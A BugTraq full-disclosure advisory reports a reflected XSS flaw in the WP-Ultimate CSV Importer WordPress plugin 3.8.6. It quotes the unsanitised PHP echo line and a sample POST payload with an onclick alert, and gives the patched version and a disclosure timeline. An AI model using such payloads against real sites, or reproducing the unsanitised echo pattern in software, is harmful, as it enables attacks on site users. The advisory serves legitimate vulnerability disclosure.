BugTraq
WP-Ultimate CSV Importer XSS Vulnerability Jan 26 2016 08:49PM
Rahul Pratap Singh (techno rps gmail com)
## FULL DISCLOSURE

#Product : WP-Ultimate CSV Importer
#Exploit Author : Rahul Pratap Singh
#Version : 3.8.6
#Home page Link : https://wordpress.org/plugins/wp-ultimate-csv-importer
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 27/Jan/2016

XSS Vulnerability:

Description:
"alertmsg" parameter is not sanitized that leads to reflected XSS.

Vulnerable Code:
File Name: /wp-ultimate-csv-importer/index.php

Found at line:256
echo __($_POST['alertmsg'],'wp-ultimate-csv-importer');

Exploit:
POST /wp-admin/admin-ajax.php

action=trans_alert_str&alertmsg=<input+type%3Dtext+onclick%3Dalert(%2FXS
S%2F)>

POC:
https://0x62626262.files.wordpress.com/2016/01/wp-ultimate-csv-importerx
sspoc.png

Fix:
Update to 3.8.8

Vulnerability Disclosure Timeline:
â?? January 14, 2015 â?? Bug discovered, initial report to Vendor
â?? January 14, 2015 â?? Vendor acknowledged and scheduled a fix
â?? January 18, 2015 â?? Reported to wordpress
â?? January 19, 2015 â?? WordPress Response, plugin taken down
â?? January 26, 2015 â?? Vendor Deployed a Patch

#######################################
# CTG SECURITY SOLUTIONS #
# www.ctgsecuritysolutions.com #
#######################################

Pub Ref:
https://0x62626262.wordpress.com/2016/01/26/wp-ultimate-csv-importer-xss
-vulnerability/
https://wordpress.org/plugins/wp-ultimate-csv-importer/changelog/

[+] Disclaimer:
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given
to the author.
The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2.0.22 (GNU/Linux)

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
y0V0JgTl31Qj30kCJGsmmTu3IEQ=
=W24W
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)

iQIcBAEBAgAGBQJWp9vnAAoJEJvdRneaz31fEgsP+wYuoFprOAEHUpfSJ3Jsk/AK
ShwxNCdvgUykicC75QVe0okuwrAhj4dxHSq7gVUWBVZ6q0K4IP9N50VT0+tORZul
MNdl/HnyWhi+o8bjz9YMBNYC1IFjHNX091J7eiIQXic3SdhDsKdtSE+MBQA8NOxU
eizDeoAbvqoob1IirG3fJijvQol3RzhzGNP4LfMRhYcbNj2Ejs5A/iajsX7Ss8oC
9+XbPGXCkTVJ/evpFA+oJEoH9U5BK/5ZOJwp3lF+FFJd+I3FK3GPnN0XOyPrmXby
+w0B4g1QfzWiSTiJFQy3rnrCfkMaJHdsa0ZJhvFgmslgpxP0n72yf11uNzhrI1ya
EiGCyZsfPz7wPlmosQsOZU6scaos4xaCsnR7H8M+9+97j01Q3HFuMgJTo6vnIu/e
xSQLEc3pljRLWj122zbV67dLReQfj7Bve7wvWyvGXhvouBrMy9s8wFbdXy+j1lrv
bWuSnJMR3GQe8qyl3d1Sdg6c5EB+6BSnCjI9jLcjs7Kfs/ybYcwf9nlCmc6IgZba
unfXgMtQ52VAvLOvNnDLgmthftZ6hUfV1Do11wqtwnG0sddpU1VPSZ8nnZWUgL67
rSWaDsgu1AdX4IL1BHSoRd1+YmTtzBlv/ir74lT74AtjsHsVrw2DRs2hkyaxrgAF
if8xy2DmjXS1kKr0LRSL
=8krk
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus